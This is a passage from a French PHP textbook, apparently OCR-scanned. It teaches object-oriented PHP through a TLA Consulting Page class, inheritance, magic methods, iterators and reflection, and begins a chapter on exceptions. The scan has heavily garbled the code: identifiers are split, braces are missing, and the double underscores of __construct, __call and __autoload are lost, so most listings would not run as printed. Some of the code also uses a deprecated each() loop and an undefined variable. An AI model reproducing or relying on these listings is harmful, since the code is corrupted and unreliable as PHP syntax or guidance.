Grace au concept d'heritage, nous avons la possibility de redefinir des operations. Nous 
pouvons redefinir une fonction Afficher ( ) volumineuse, mais il est peu probable que 
nous soyons amends a changer la maniere dont toute la page est affichee. II est par 
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consequent preferable de diviser la fonctionnalite d'affichage en quelques taches auto- 
nomes, de sorte a pouvoir redefinir les seules parties qui doivent etre modifiables. 

La fonction Af f icher ( ) invoque Af f icherTitre( ), Af f icherMotsCles ( ), Af f icherS 
tyles( ), Af f icherEntete ( ), Af f icherMenu ( ) et Af f icherPied( ). Nous devons done 
definir ces operations. En PHP, nous pouvons ecrire les operations ou fonctions dans cet 
ordre logique, en appelant l'operation ou la fonction avant que son code n'ait ete dent, 
alors que dans de nombreux autres langages de programmation la fonction ou l'operation 
doivent etre ecrites avant d'etre appelees. 

La plupart des operations sont relativement simples et se contentent d'afficher du code 
HTML et, eventuellement, le contenu des attributs. 

Le Listing 6.1 donne l'integralite du code de la classe Page. Ce script est enregistre 
dans le fichier page.inc, pour etre inclus dans d' autres fichiers. 

Listing 6.1 : page.inc — La classe Page constitue un moyen facile et flexible de creation 
de pages pour le site TLA Consulting 



<?php 

class Page { 

// Attributs de la classe Page 
public $contenu; 

public $titre = "TLA Consulting Pty Ltd"; 

public $mots_cles = "TLA Consulting, Three Letter Abbreviation, 
les moteurs de recherche sont mes amis"; 

public $boutons = array( "Accueil" => "acceuil.php" , 

"Contacts" => "contacts . php" , 
"Services" => "services. php" , 
"Carte du site" => "carte. php" 

); 

// Operations de la classe Page 

public function set($nom, $valeur) { 

$this->$nom = $valeur; 

} 

public function Afficher() { 
echo "<html>\n<head>\n" ; 
$this -> Aff icherTitre( ) ; 
$this -> Aff icherMotsCles ( ) ; 
$this -> Aff icherStyles( ) ; 
echo "</head>\n<body>\n" ; 
$this -> Aff icherEntete( ) ; 
$this -> Aff icherMenu ($this->boutons) ; 
echo $this->contenu; 
$this -> Aff icherPied( ) ; 
echo "</body>\n</html>\n" ; 

} 

public function Af f icherTitre ( ) { 
echo "<title>" . $this->titre . "</title>"; 

} 
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public function Af f icherMotsCles ( ) { 
echo '<meta name=" keywords" content=" ' . $this->mots_cles . '"/>'; 

} 

public function Af f icherStyles ( ) { 

?> 

<style> 
m { 

color:white; font-size : 24pt ; text-align:center; 
font-family : arial, sans-serif 

} 

.menu { 

color:white; font-size : 1 2pt ; text-align:center; 
f ont- family : arial, sans-serif ; font -weight : bold 

} 

td { 

background:black 

} 

P { 

color:black; font-size : 12pt ; text-align: justify; 
f ont -family : arial, sans-serif 

} 

p. foot { 

color:white; font-size : 9pt ; text-align : center ; 
f ont -family : arial, sans-serif ; font -weight : bold 

} 

a:link,a:visited,a:active { 
color :white 

} 

</style> 
<?php 
} 

public function Af f icherEntete ( ) { 

?> 

<table width="100%" cellpadding="12" cellspacing="0" border="0"> 
<tr bgcolor="black"> 

<td align="left"><img src="logo.gif " /></td> 

<td> 

<h1 >TLA Consulting</h1> 
</td> 

<td align="right"><img src="logo.gif " /></td> 
</tr> 
</table> 
<?php 
} 

public function AfficherMenu($boutons) { 
echo '<table width="100%" bgcolor="white" 

cellpadding="4" cellspacing="4"> ' ; 
echo "\n<tr>\n"; 

// Calcul de la taille des bouton 
$largeur = 100 / count ($boutons) ; 

while (list($nom, $url) = each ($boutons) ) { 
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$this->Af f icherBouton ($largeur, $nom, $url, 
!$this->EstPageCourante($url) ) ; 

} 

echo "</tr>\n"; 
echo "</table>\n" ; 



public function EstPageCourante ($url) { 

if (strpos($_SERVER[ 'PHP_SELF' ] , $url ) == false) { 

return false; 
} else { 

return true; 

} 



public function Aff icherBouton ($largeur, $nom, $url, $active = true) { 
if ($active) { 
echo "<td width = \"" . $largeur . "%\"> 
<a href=\"" . $url . "\"> 

<img src=\ "s-logo.gif \ " alt=\"" . $name . "\" border=\"0\" /></a> 
<a href=\"" . $url . "\"><span class=\ "menu\ ">" . $nom . "</span></a> 
</td>"; 
} else { 

echo "<td width=\"" . $largeur . "%\"> 
<img src=\ "side-logo. gif\ "> 
<span class=\ "menu\ ">" . $nom . "</span> 
</td>"; 

} 

} 



public function Af f icherPied ( ) 
{ 

?> 

<table width="100%" bgcolor="black" cellpadding="12" border="0"> 

<tr> 

<td> 

<p class="foot">&copy ; TLA Consulting . </p> 

<p class="foot">Consultez notre <a href ="">page d ' informations 

legales</a></p> 
</td> 
</tr> 
</table> 
<?php 
} 

} 

?> 



A la lecture du Listing 6.1, vous remarquerez que Aff icherStyles( ), Afficher 
Entete ( ) et Aff icherPied ( ) doivent afficher beaucoup de HTML statique, sans traite- 
ment PHP. C'est la raison pour laquelle ces operations sont implementees sous la forme 
d'une simple balise de fermeture PHP (?>), suivie du code HTML, puis d'une balise 
d'ouverture PHP (<?php). 
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La classe Page comprend deux autres operations que celles citees dans le paragraphe 
precedent. L' operation Af f icherBouton ( ) produit un simple bouton de menu. Si ce 
bouton doit pointer sur la page courante, il est remplace par un bouton inactif, d'appa- 
rence legerement differente et ne pointant sur aucune page. Cette astuce permet de 
conserver une presentation coherente des pages du site et donne aux visiteurs une indi- 
cation sur leur localisation dans le site. 

L' operation EstPageCourante( ) determine si l'URL qui lui a ete passee en parametre 
pointe sur la page courante. II existe de nombreuses techniques pour ecrire ce type de 
test ; ici, nous faisons appel a la fonction strpos ( ) pour determiner si l'URL est contenue 
dans l'une des variables de serveur. L'instruction strpos ( $ SERVER [ 'PHP SELF' ], 
$url ) renvoie un nombre si la chame stockee dans $url est contenue dans la variable 
superglobale $ SERVER [ ' PHP SELF ' ] ou renvoie la valeur false dans le cas contraire. 

Pour utiliser la classe Page, nous devons inclure le fichier page.inc dans un script et 
appeler Aff icher ( ). 

Le code du Listing 6.2 cree la page d'accueil du site de l'entreprise Active TLA Consulting 
et donne un resultat tres semblable a celui montre a la Figure 6.2. 

Le code du Listing 6.2 fonctionne de la maniere suivante : 

1. II utilise l'instruction require pour inclure le contenu de page.inc qui contient la 
definition de la classe Page. 

2. II cree une instance de la classe Page. Cette instance est appelee $page accueil. 

3. II definit le contenu, constitue de texte et de balises HTML qui doivent figurer dans 
la page (ce qui appelle implicitement la methode set ( )). 

4. II appelle l'operation Aff icher ( ) sur l'objet $page accueil pour provoquer l'affi- 
chage de la page dans le navigateur web du visiteur. 

Listing 6.2 : accueil. php — Cette page d'accueil est obtenue en utilisant la classe Page 
pour accomplir I'essentiel du travail necessaire a la generation de la page 

<?php 

require( "page. inc" ) ; 
$page_accueil = new Page(); 

$page_accueil->contenu = "<p>Bienvenue sur le site de TLA Consulting. 
Prenez le temps de nous connaitre.</p> 
<p>Nous sommes specialises dans l'aide aux decisions et 
nous esperons que vous ferez bientot appel a nous.</p>"; 

$page_accueil->Aff icher ( ) ; 
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Le Listing 6.2 montre la facilite avec laquelle de nouvelles pages web peuvent etre 
ajoutees au site grace a la classe Page. En outre, cette approche permet d'obtenir des 
pages d'apparence tres similaire sur 1' ensemble du site. 

Pour utiliser une variante de la page standard dans une certaine partie du site, il suffit de 
copier page.inc dans un nouveau fichier appele pcige2.inc et d'y apporter les modifications 
voulues. Toutefois, apres avoir opere une telle "scission" de notre modele, nous devrons 
reproduire dans le fichier page2.inc les eventuelles mises a jour effectuees dans page.inc. 

Le concept d'heritage nous offre une solution bien meilleure : nous pouvons creer une 
nouvelle classe qui herite de l'essentiel de la fonctionnalite de la classe Page, mais qui 
redefinit les parties que nous voulons presenter differemment. 

Dans le cas du site TLA, par exemple, nous pourrions vouloir inserer une seconde barre 
de navigation dans la page des services. 

Le script du Listing 6.3 realise cette modification en creant une nouvelle classe appelee 
PageServices qui herite de la classe Page. Les boutons et les liens que nous voulons 
voir figurer sur une seconde ligne sont enregistres dans un nouveau tableau, appele 
$boutonsLigne2. Cette classe devant avoir un comportement tres semblable a celui de 
la classe Page, nous ne redefmissons que les parties a modifier, c'est-a-dire 1' operation 
Aff icher ( ). 

Listing 6.3 : services.php — La classe PageServices herite de la classe Page mais 
redefinit I'operation AfficherQ de sorte a produire une barre de navigation differente 



<?php 

require ("page.inc"); 

class PageServices extends Page { 
private $boutonsLigne2 = array( 

"Re-engineering" => "reengineering.php" , 
"Conformite aux standards" => "standards. php" , 
"Respect du Buzz" => "buzzword . php" , 
"Missions" => "mission . php" 

); 

public function Afficher() { 
echo "<html>\n<head>\n" ; 
$this->Af f icherTitre( ) ; 
$this->Aff icherMotsCles( ) ; 
$this->Aff icherStyles( ) ; 
echo "</head>\n<body>\n" ; 
$this->Aff icherEntete( ) ; 
$this->Aff icherMenu ($this->boutons) ; 
$this->Aff icherMenu ($this->boutonsLigne2) ; 
echo $this->contenu; 
$this->Aff icherPied( ) ; 
echo "</body>\n</html>\n" ; 

} 

} 
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$services = new PageServices ( ) ; 

$services->contenu ="<p>TLA Consulting offre un grand nombre de 
services. La productivity de vos employes s ' ameliorerait 
surement si nous reorganisions votre entreprise. Votre societe 
necessite peut-etre une redefinition de sa mission ou d'un 
nouveau lot de mots a la mode.</p>"; 

$services -> Afficher(); 



L' operation Afficher() redefinie est analogue a l'operation Afficher() de la classe 
Page, sauf qu'elle contient la ligne supplementaire suivante : 

$this->Af f icherMenu ($this->boutonsLigne2) ; 

Cette ligne appelle Aff icherMenu ( ) une seconde fois, de sorte a creer la seconde barre 
de menus. 

En dehors de la definition de la classe, nous creons une instance de la classe Page 
Services, nous definissons les valeurs qui requierent des valeurs differentes de celles 
par defaut, puis nous appelons Af f icher ( ) . 

Comme le montre la Figure 6.2, nous produisons bien ainsi une variante de la page 
standard. Pour cela, nous nous sommes contentes d'ecrire du nouveau code pour les 
seules parties reellement differentes. 



TLA Consulting Pty Ltd CD 
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O Services 


O Carts du sits 


O Re-enqineerin a 
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TLA Consulting offre un grand nombre de services. La productivite de vos employes 
s'ameliorerail surement si nous reorganisions votre entreprise. Votre societe necessite 
peut-etre une redefinition de sa mission ou d'un nouveau lot de mots a la mode. 



©TLA Consulting, 
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Figure 6.2 

La page des services est produite sur le principe de /'heritage, de sorte a reutiliser I'essentiel 
du contenu de la page standard. 



Chapitre 6 



PHP oriente objet 1 97 



La creation de pages via des classes PHP presente des avantages indeniables. Comme 
nous disposons d'une classe capable de faire l'essentiel du travail a notre place, la crea- 
tion d'une nouvelle page ne necessite que tres peu d'efforts. De plus, nous pouvons 
facilement mettre a jour toutes les pages du site en une seule fois, en travaillant directe- 
ment a la source, c'est-a-dire sur la classe. Grace au principe de l'heritage, il est facile 
d'obtenir differentes variantes d'une meme classe tout en conservant les avantages de la 
classe d'origine. 

Comme c'est helas generalement le cas, les avantages de cette approche ont un cotit. 

La generation de pages a partir d'un script requiert plus d'effort de la part du processeur 
de l'ordinateur que le simple chargement d'une page HTML statique a partir d'un 
disque dur ou la transmission d'une page a un navigateur. Sur un site tres frequente, ce 
detail peut etre important et vous devrez alors faire en sorte d'utiliser des pages HTML 
statiques ou de mettre en cache la sortie de vos scripts a chaque fois que cela est possible 
afm de reduire la charge pesant sur le serveur. 

Comprendre les fonctionnalites orientees objet avancees de PHP 

Dans les sections suivantes, nous traiterons des fonctionnalites orientees objet avancees 
de PHP 

Constantes de classe 

PHP permet de creer des constantes de classe, qui peuvent etre utilisees sans qu'il soit 
necessaire d'instancier la classe : 

<?php 

class Math { 

const pi = 3.14159; 

} 

echo "Math::pi = " . Math::pi. "\n"; 
?> 

Vous pouvez acceder a la constante de classe en utilisant l'operateur : : pour indiquer la 
classe a laquelle la constante appartient, comme dans l'exemple precedent. 

Methodes statiques 

PHP 5 dispose du mot-cle static, qui peut etre applique aux methodes ann de leur 
permettre d'etre appelees sans instancier la classe. II s'agit d'une notion equivalente de 
celle de constante de classe. Par exemple, vous pourriez ajouter une methode carre ( ) a 
la classe Math de la section precedente et invoquer cette methode sans instancier la 
classe : 

class Math { 
static function carre ($valeur) { 
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return $valeur * $valeur; 

} 

} 

echo Math: :carre(8) ; 

Notez que vous ne pouvez pas utiliser le mot-cle this a l'interieur d'une methode stati- 
que, car il n'y a aucune instance a laquelle se referer. 

Verification du type de classe et indication de type 

Le mot-cle instanceof permet de verifier le type d'un objet. Avec lui, vous pouvez 
verifier si un objet est une instance d'une classe particuliere, s'il herite d'une classe ou 
s'il implemente une interface. Le mot-cle instanceof est, en realite, un operateur 
conditionnel. Par exemple, avec les exemples precedents, dans lesquels la classe B est 
une sous-classe de la classe A : 



(Sb instanceof B) serait vrai. 

($b instanceof A) serait vrai. 

($b instanceof Affichable) serait faux. 



Tous ces exemples presupposent que A, B et Affichable se trouvent dans la portee 
courante. Sinon une erreur est declenchee. 

Vous pouvez egalement utiliser 1' indication de type de classe. Normalement, lorsque 
vous passez un parametre a une fonction dans PHP, vous ne passez pas le type de ce 
parametre. Avec 1' indication de type de classe, vous pouvez preciser le type de classe 
qui doit etre passe ; s'il ne s'agit pas du type effectivement passe, une erreur sera 
declenchee. La verification de type est l'equivalent de instanceof. 

Voici un exemple : 

function verif_type(B $uneClasse) { 
//. . . 

} 

Cet exemple suggere que $uneClasse doit etre une instance de la classe B. Si vous 
passez ensuite une instance de la classe A de la maniere suivante : 

verif_type($a) ; 

vous obtiendrez cette erreur fatale : 

Fatal error: Argument 1 must be an instance of B 

Notez que, si vous aviez indique A et passe une instance de B, aucune erreur ne serait 
survenue, car B herite de A. 
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Clonage d'objets 

Le mot-cle clone permet de copier un objet existant. L' instruction suivante, par exemple : 
$c = clone $b; 

cree une copie de l'objet $b de la meme classe, avec les memes valeurs d'attributs. 

Vous pouvez egalement modifier ce comportement. Si vous souhaitez que le clonage 

n'adopte pas le comportement par defaut, vous devez creer une methode clone () 

dans la classe de base. Cette methode est semblable a un constructeur ou a un destruc- 
teur car on ne l'appelle pas directement : elle est invoquee lorsque Ton utilise le mot-cle 

clone comme ici. Dans cette methode clone ( ) , vous pouvez ensuite definir exactement 

le comportement de copie que vous souhaitez. 

Le fait interessant concernant la fonction clone ( ) tient a ce qu'elle est appelee apres 

qu'une copie exacte eut ete effectuee en utilisant le comportement par defaut, ce qui 
permet a ce stade de ne modifier que ce que vous souhaitez changer. 

Le plus souvent, on ajoute a clone () du code pour garantir que les attributs de la 

classe qui sont geres comme des references seront correctement copies. Si vous vous 
preparez a doner une classe qui contient une reference a un objet, vous souhaiterez sans 
doute obtenir une seconde copie de cet objet au lieu d'une seconde reference au meme 
objet. II est alors judicieux d'ajouter cette fonctionnalite a clone ( ) . 

II est egalement possible que vous choisissiez de ne rien changer mais de realiser 
d'autres actions, par exemple en mettant a jour un enregistrement d'une base de 
donnees sous-jacente liee a la classe. 

Classes abstraites 

PHP permet d'ecrire des classes abstraites qui ne peuvent pas etre instanciees, ainsi que 
des methodes abstraites qui fournissent la signature d'une methode mais n'en proposent 
pas d' implementation. Voici un exemple d'une telle methode : 

abstract operationX($param1 , $param2); 

Toute classe qui contient des methodes abstraites doit elle-meme etre abstraite, comme 
le montre cet exemple : 

abstract class A { 

abstract function operationX($param1 , $param2); 

} 

L usage principal des methodes et des classes abstraites concerne le cas des hierarchies 
de classes complexes ou vous souhaitez vous assurer que chaque sous-classe contient et 
redefmit certaines methodes particulieres. Ce but peut egalement etre atteint avec une 
interface. 



200 Partie I 



Utilisation de PHP 



Surcharge de methodes avec callQ 

Nous avons precedemment examine un certain nombre de methodes ayant des signifi- 
cations speciales et dont les noms commencent par un double blanc souligne ( ), 

comme get ( ), set ( ), construct ( ) et destruct ( ). La methode call( ), 

qui est utilisee dans PHP pour implementer la surcharge de methodes, en est un autre 
exemple. 

La surcharge de methode est courante dans de nombreux langages orientes objet mais 
elle n'est pas aussi utile en PHP parce que Ton a tendance a plutot employer des types 
flexibles et des parametres facultatifs de fonction (simples a implementer). 

Pour l'utiliser, vous devez implementer une methode call(), comme dans cet 

exemple : 

public function call($methode, $p) { 

if ($methode == "Afficher") { 
if (is_object($p[0] ) ) { 

$this->AfficherObjet($p[0] ) ; 
} else if (is_array ($p[0] ) ) { 

$this->Aff icherTableau($p[0] ) ; 
} else { 

$this->Aff icherScalaire($p[0] ) ; 

} 

} 

} 

La methode call() attend deux parametres. Le premier contient le nom de la 

methode invoquee et le second, un tableau des parametres passes a cette methode. Vous 
pouvez ensuite decider par vous-meme de la methode sous-jacente a appeler. Dans ce 
cas, si un objet est passe a la methode Aff icher ( ), vous appelez la methode Af f iche 
r0bjet() sous-jacente ; si un tableau est passe, vous appelez Af f icherTableau ( ) ; 
dans tous les autres cas, vous appelez AfficherScalaire(). 

Pour appeler ce code, vous devez d'abord instancier la classe contenant cette methode 

call() (supposons qu'elle s'appelle Surcharge) puis invoquer la methode Affi 

cher () , comme dans cet exemple : 

$obj = new Surcharge; 
$obj->Afficher(array(1 , 2, 3)); 
$obj ->Aff icher( "chat" ) ; 

Le premier appel a Aff icher () invoquera Aff icherTableau ( ) et le second, Afficher 
Scalaire( ). 

Notez que vous n'avez besoin d'aucune implementation sous-jacente de la methode 
Aff icher ( ) pour que ce code fonctionne. 
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Utiliser autoload() 

La fonction autoload () est une autre fonction speciale de PHP. II s'agit non pas 

d'une methode de classe mais d'une fonction autonome. Autrement dit, il faut la decla- 
rer en dehors de toute classe. Si vous l'implementez, elle sera automatiquement appelee 
lorsque vous tenterez d'instancier une classe qui n'a pas ete declaree. 

L' utilisation principale de autoload ( ) consiste a inclure tous les fichiers requis pour 

instancier une classe. Considerez l'exemple suivant : 

function autoload ($nom) { 

include_once $nom . ".php"; 

} 

Cette implementation tente d'inclure un fichier possedant le meme nom que la classe. 
Implementation des iterateurs et iterations 

L'une des fonctionnalites astucieuses du moteur oriente objet de PHP tient a ce que 
vous pouvez utiliser une boucle foreach() pour parcourir les attributs d'un objet 
comme vous le feriez avec un tableau. Voici un exemple : 

class MaClasse { 
public $a = 5; 
public $b = 7; 
public $c = 9; 

} 

$x = new MaClasse; 
foreach ($x as $attribut) { 
echo $attribut . "<br />"; 

} 

A l'heure ou nous ecrivons ces lignes, le manuel PHP suggere qu'il faut implementer 
l'interface vide Traversable pour que l'interface foreach fonctionne mais, si vous le 
faites, une erreur fatale se produit. Inversement, tout semble fonctionner si vous ne 
l'implementez pas. 

Si vous avez besoin d'un comportement plus sophistique, vous pouvez implementer un 
iterateur. Pour cela, il faut que la classe sur laquelle vous souhaitez operer 1' iteration 
implemente l'interface IteratorAggregate et vous devez lui ecrire une methode appelee 
getlterator qui renvoie une instance de la classe d'iterateur. Cette classe d'iterateur doit 
implementer l'interface Iterator, qui possede une serie de methodes que vous devrez 
done egalement implementer. Le Listing 6.4 montre un exemple de classe et d'iterateur. 

Listing 6.4 : iterator.php — Exemple de classe de base et de classe d'iterateur 

<?php 

class IterateurObjet implements Iterator { 
private $obj ; 
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private $cpteur; 
private $indiceCourant; 

function construct ($obj ) { 

$this->obj = $obj ; 

$this->cpteur = count ($this->obj ->donnees) ; 

} 

function rewind() { 

$this->indiceCourant = 0; 

} 

function valid() { 

return $this->indiceCourant < $this->cpteur; 

} 

function key() { 

return $this->indiceCourant ; 

} 

function current() { 

return $this->obj->donnees[$this->indiceCourant] ; 

} 

function next() { 

$t his- >indiceCou rant ++; 

} 



class Objet implements IteratorAggregate { 
public $donnees = array(); 

function construct($in) 

{ 

$this->donnees = $in; 

} 

function getlterator ( ) { 

return new Objectlterator($this) ; 

} 

} 

$monObjet = new 0bjet(array(2, 4, 6, 8, 10)); 
$monIter = $monObjet->getIterator( ) ; 

for($monIter->rewind( ) ; $monIter->valid ( ) ; $monIter->next ( ) ) { 
$cle = $monIter->key ( ) ; 
$valeur = $monIter->current ( ) ; 
echo $cle . "=> " . $valeur . "<br />"; 

} 

?> 



Laclasse IterateurObj et possede unjeu de fonctions requis par 1' interface Iterator : 

I Le constructeur n'est pas obligatoire, mais il s'agit evidemment d'un bon emplace- 
ment pour definir les valeurs pour le nombre d' elements que vous prevoyez de 
parcourir et un lien vers l'element courant. 

■ La fonction rewind ( ) doit repositionner le pointeur de donnees interne au debut des 
donnees. 
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l La fonction valid () doit vous indiquer si d'autres donnees existent encore a 
1' emplacement courant du pointeur de donnees. 

La fonction key ( ) doit renvoyer la valeur du pointeur de donnees. 

■ La fonction value () doit renvoyer la valeur stockee au niveau du pointeur de 
donnees courant. 

■ La fonction next ( ) doit faire avancer le pointeur de donnees. 

La raison pour laquelle on utilise une classe d'iterateur comme celle-ci est que l'inter- 
face vers les donnees ne changera pas meme si 1' implementation sous-jacente devait 
etre modifiee par la suite. Dans cet exemple, la classe IteratorAggregate est un simple 
tableau ; si vous decidiez de la modifier en la remplacant par un tableau de hachages ou 
une liste chainee, vous pourrez toujours utiliser un Iterator standard pour la traverser, 
meme si le code de la classe Iterator devrait etre modifie. 

Conversion de classes en chaines 

Si vous implementez une methode toString() dans votre classe, elle sera appelee 

lorsque vous essayez d'afficher un objet de cette classe, comme dans cet exemple : 

$p = new Affichable; 
echo $p; 

echo affichera alors ce que renvoie la methode toString ( ). Vous pourriez par exemple 

l'implementer de la facon suivante : 

class Affichable { 
public StestUn; 
public StestDeux; 

public function toString() { 

return(var_export($this, TRUE)); 

} 

} 

La fonction var export ( ) affiche toutes les valeurs d'attribut de la classe. 
Utiliser I'API d'introspection 

L introspection est la possibility d'interroger des classes et des objets existants afin de 
connaitre leur structure et leur contenu. Cette capacite peut etre utile lorsque vous effec- 
tuez un interfacage avec des classes inconnues ou non documentees, par exemple avec 
des scripts PHP encodes. 

L'API est extremement complexe, mais nous examinerons un exemple simple afin de 
vous donner un avant-gout de l'interet qu'elle peut avoir. Par exemple, considerez la 
classe Page defmie dans ce chapitre. Vous pouvez obtenir toutes les informations 
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concernant cette classe a partir de l'API d'instrospection, comme le montre le 
Listing 6.5. 

Listing 6.5 : introspection.php — Affichage d'informations concernant la classe Page 

<?php 

require_once( "page. inc" ) ; 

$classe = new ReflectionClass( "Page" ) ; 

echo ' <pre> ' ; 

echo $classe; 

echo ' </pre> ' ; 

?> 



Ici, vous utilisez la methode toString ( ) de la classe Reflection pour imprimer ces 

donnees. Notez que les balises <pre> se trouvent sur des lignes separees afin de ne pas 
perturber la methode toString ( ) . 

Le premier ecran de sortie de ce code est presente a la Figure 6.3. 



Figure 6.3 

La sortie de l'API d'intro- 
spection est etonnamment 
detaillee. 
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Class [ class Page ] { 

%% /Users/ jaco/Sifces/chapitre 6/page.inc 2-136 






- Constants [0] [ 

1 








- Static properties [ ] [ 

1 








- Static methods (0] { 

» 








- Properties [4] { 

Property [ public $ content! ] 
Property [ public Stitre ] 
Property [ public ?inots_clcs ] 
Property [ public Sboutons ] 

» 








- Methods [10] { 

Method [ public method set ] { 

@@ /Users/ jaco/ Sites /chapit re 6 /page, inc 


15 - 
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- Parameters |2] { 

Parameter #0 [ Snora ] 
Parameter #1 [ $valeur ] 

> 
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Method [ public method Afficher ] { 

8i /Users/ jaco /Sit es/chapit re 6/page.inc 
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Method [ public method Aff ichcrTitre ] { 
@@ /Users/ jaco/ Sites /chapit re 6/page.inc 
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32 - 


34 





Pour la suite 

Le chapitre suivant presente le traitement des exceptions en PHP, qui constituent un 
mecanisme elegant pour la gestion des erreurs d'execution. 
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Dans ce chapitre, nous presenterons la gestion des exceptions et son implementation 
dans PHP. Les exceptions offrent un mecanisme unifie pour gerer les erreurs de maniere 
evolutive, adaptee a la maintenance et orientee objet. 

Notions relatives a la gestion des exceptions 

L'idee fondamentale de la gestion des exceptions tient a ce que le code est execute a 
l'interieur de ce que Ton appelle un bloc try. II s'agit d'une section de code qui ressemble 
a ceci : 

try { 

// Le code vient ici 

} 

Si quelque chose se passe mal a l'interieur du bloc try, vous pouvez lever une 
exception. Certains langages, comme Java, levent automatiquement des exceptions 
dans certains cas. En PHP, les exceptions doivent etre levees manuellement, comme 
ici : 

throw new Exception ( 'message ' , code); 

Le mot-cle throw declenche le mecanisme de gestion des exceptions. II s'agit d'une 
structure du langage plutot que d'une fonction, mais vous devez lui passer une valeur. 
Elle s' attend a recevoir un objet. Dans le cas de figure le plus simple, vous pouvez 
instancier la classe predefinie Exception, comme dans l'exemple precedent. 

Le constructeur de cette classe attend deux parametres : un message et un code qui 
represented, respectivement, le message de l'erreur et son numero de code. lis sont 
tous deux facultatifs. 
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Enfin, sous le bloc try, vous avez besoin au minimum d'un bloc catch, qui doit ressembler 
a ceci : 

catch (indication du type de l'exception { 
// gestion de l'exception 

} 

Plusieurs blocs catch peuvent etre associes a un meme bloc try. C'est notamment 
coherent si chaque bloc catch capture un type d'exception different. Si, par exemple, 
vous souhaitez capturer des exceptions de la classe Exception, votre bloc catch pourrait 
ressembler a ceci : 

catch (Exception $e) { 
// gestion de l'exception 

} 

L'objet passe dans (et capture par) le bloc catch est celui qui est transmis a (et lance 
par) l'instruction throw qui a leve l'exception. L'exception peut etre de n'importe quel 
type, mais il est preferable d'utiliser des instances de la classe Exception ou des exceptions 
que vous avez definies vous-meme et qui heritent de la classe Exception (vous verrez 
comment definir vos propres exceptions plus loin dans ce chapitre). 

Lorsqu'une exception est levee, PHP recherche un bloc catch correspondant. S'il 
existe plusieurs blocs catch, les objets passes a chacun d'entre eux doivent etre de 
types differents afm que PHP puisse determiner sur quel bloc catch il convient de 
retomber. 

Notez par ailleurs que vous pouvez lever d'autres exceptions a l'interieur d'un bloc 
catch. 

Pour rendre ces explications plus claires, considerez l'exemple simple de gestion 
d'exception presente dans le Listing 7.1. 

Listing 7.1 : basicjexception.php — Lever et capturer une exception 

<?php 
try { 

throw new Exception( "Une terrible erreur s'est produite", 42); 

} 

catch (Exception $e) { 
echo "Exception " . $e->getCode( ) . ": " . $e->getMessage( ) . 

" dans " . $e->getFile( ) . " en ligne ". $e->getLine( ) . "<br />"; 

} 

?> 



Dans le Listing 7.1, vous pouvez remarquer que nous avons utilise un certain nombre 
de methodes de la classe Exception, sur lesquelles nous reviendrons dans un instant. 
Le resultat de ce code est presente a la Figure 7.1. 
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Figure 7. 1 

Ce fa/oc catch signale le message d'erreur de /'exception et I'endroit oil /'exception est survenue. 

Dans cet exemple, vous pouvez remarquer que nous levons une exception de la classe 
Exception. Cette classe predetinie possede des methodes que vous pouvez utiliser dans 
le bloc catch afin de produire un message d'erreur utile. 

La classe Exception 

PHP dispose d'une classe predetinie appelee Exception. Son constructeur prend deux 
parametres, comme indique precedemment : un message et un code d'erreur. 

Outre ce constructeur, cette classe propose les methodes suivantes : 

■ getCode ( ) . Rennvoie le code tel qu'il a ete passe au constructeur. 

■ getMessage ( ) . Renvoie le message tel qu'il a ete passe au constructeur. 

■ getFile ( ) . Renvoie le chemin d'acces complet au fichier dans lequel l'exception a 
ete levee. 

■ getLine(). Renvoie le numero de ligne du fichier dans lequel l'exception a ete 
levee. 

■ getTrace(). Renvoie un tableau contenant une trace d 'execution de I'endroit ou 
l'exception a ete levee. 

■ getTraceAsString ( ). Renvoie les memes informations que getTrace, formatees 
sous forme de chaine. 

■ toString(). Permet d'effectuer un simple echo d'un objet Exception, en four- 

nissant toutes les informations des methodes precedentes. 

Comme vous le voyez, nous avons utilise les quatre premieres methodes dans le 
Listing 7.1. Vous pouvez obtenir les memes informations (ainsi que la trace d'execution) a 
l'aide de 1' instruction suivante : 

echo $e; 

La trace d'execution indique quelles fonctions s'executaient au moment ou l'exception 
a ete levee. 
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Exceptions definies par I'utilisateur 

Au lieu d'instancier et de passer une instance de la classe de base Exception, vous 
pouvez passer l'objet que vous souhaitez. Dans la plupart des cas, vous etendrez la 
classe Exception afin de creer vos propres classes d'exception. 

Vous pouvez passer n'importe quel autre objet avec votre clause throw. II se peut que 
vous souhaitiez occasionnellement le faire si vous avez des problemes avec un objet 
particulier et que vous souhaitiez le passer pour des besoins de debogage. 

La plupart du temps, cependant, vous etendrez la classe Exception. Le manuel PHP 
fournit du code qui presente le squelette de la classe Exception. Ce code, qui peut etre 
telecharge a l'adresse http://www.php.net/zend-engine-2.php, est reproduit dans le 
Listing 7.2. Notez qu'il s'agit non pas du code lui-meme mais de ce que vous pouvez 
vous attendre a heriter. 

Listing 7.2 : classe Exception — Ce que vous pouvez vous attendre a heriter 

<?php 

class Exception { 

function construct (string $message = NULL, int $code = 0) { 

if (f unc_num_args( ) ) { 

$this->message = $message; 

} 

$this->code = $code; 

$this->file = FILE ; // de la clause throw 

$this->line = LINE ; // de la clause throw 

$this->trace = debug_backtrace ( ) ; 
$this->string = StringFormat($this) ; 

} 

protected $message = "Unknown exception"; // message de 1' exception 
protected $code = 0; // code d'exception defini par I'utilisateur 
protected $file; // nom du fichier source de l'exception 
protected $line; // ligne source de l'exception 

private $trace; // trace d'execution de l'exception 
private $string; // usage interne uniquement !! 

final function getMessage ( ) { 
return $this->message; 

} 

final function getCode() { 
return $this->code; 

} 

final function getFile() { 
return $this->file; 

} 

final function getTrace() { 
return $this->trace ; 

} 

final function getTraceAsString ( ) { 
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return self : :TraceFormat($this) ; 

} 

function _toString() { 
return $this->string ; 

} 

static private function StringFormat (Exception $exception) { 
// ... fonction non disponible dans les scripts PHP 
// qui renvoie toutes les infos pertinentes sous forme de chaine 

} 

static private function TraceFormat ( Exception $exception) { 
// ... fonction non disponible dans les scripts PHP 
// qui renvoie la trace d 1 execution sous forme de chaine 

} 

} 



La raison principale qui nous amene a examiner cette definition de classe consiste a 
noter que la plupart des methodes publiques sont finales : vous ne pouvez done pas les 
redefinir. Vous pouvez creer vos propres sous-classes Exceptions, mais vous ne pouvez 
pas modifier le comportement des methodes de base. Notez que vous pouvez redefinir 

la fonction toString ( ) , ce qui vous permet de modifier la maniere dont l'exception 

sera affichee. Vous pouvez egalement ajouter vos propres methodes. 

Le Listing 7.3 presente un exemple de classe Exception dermic par l'utilisateur. 

Listing 7.3 : exception _utilisateur.php — Exemple de classe Exception definie 
par l'utilisateur 



<?php 

class MonException extends Exception { 

function toString () { 

return "<table border=\ " 1 \ "> 
<tr> 

<td><strong>Exception " . $this->getCode ( ) 
